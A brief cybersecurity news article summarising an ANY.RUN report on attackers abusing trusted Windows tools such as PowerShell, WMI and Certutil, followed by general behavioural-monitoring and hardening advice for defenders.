FHN 
Cybercriminals are increasingly abusing legitimate system tools to launch Trusted Tools Malware attacks while avoiding detection. According to a recent Q1 2026 Cyber Risk Report from ANY.RUN, attackers are relying more heavily on trusted Windows utilities to gain access, steal credentials, and deploy malware without triggering traditional security defenses.
Because these tools are already installed on most systems and commonly used by administrators, malicious activity can easily blend in with normal operations.
ANY.RUN Report Reveals Growing Threat
According to ANY.RUN’s analysis of more than 2 million malware and phishing investigations during the first quarter of 2026, threat actors are rapidly shifting toward stealthier attack techniques.
The report highlights:
- Loader-based attacks nearly doubled
- Credential theft increased significantly
- Living-off-the-Land (LotL) techniques grew by more than 58%
- Attackers increasingly abused trusted system utilities
- Malware campaigns became more automated and difficult to detect
Researchers noted that attackers often use tools such as PowerShell, WMI, Certutil, MSHTA, and JavaScript execution environments to perform malicious actions while appearing legitimate.
These trusted tools allow attackers to:
- Download malware payloads
- Execute fileless attacks
- Establish persistence
- Move laterally through networks
- Avoid traditional antivirus detection
Security experts warn that attackers can establish persistence within seconds, leaving defenders with very little time to respond.
Credential Theft Continues to Drive Attacks
ANY.RUN researchers found that credential theft remains one of the primary goals for modern threat actors.
Once attackers obtain valid credentials, they can access systems while appearing to be legitimate users. Combined with trusted tool abuse, this creates a dangerous scenario where malicious activity can remain hidden for extended periods.
Many attackers begin with lightweight loaders that quietly gain initial access before deploying more dangerous payloads such as:
- Ransomware
- Remote Access Trojans (RATs)
- Information stealers
- Credential theft tools
This approach allows cybercriminals to scale attacks while minimizing detection.
Strengthening Defenses Against Trusted Tool Abuse
Because legitimate tools generate normal-looking activity, ANY.RUN recommends focusing on behavioral monitoring rather than relying solely on traditional signature-based security solutions.
Organizations should monitor for:
- Unusual PowerShell commands
- Suspicious script execution
- Abnormal command-line arguments
- Unexpected network connections
- Unusual administrative activity
- Suspicious parent-child process relationships
Additional recommendations include:
- Enforcing least-privilege access
- Restricting script execution
- Using application control policies
- Leveraging threat intelligence
- Deploying sandbox analysis solutions
- Improving incident response capabilities
The findings show that attackers are becoming increasingly skilled at hiding in plain sight. As trusted tools continue to be weaponized, organizations must focus on behavior-based detection and rapid response strategies to identify threats before they can cause significant damage
About the Author
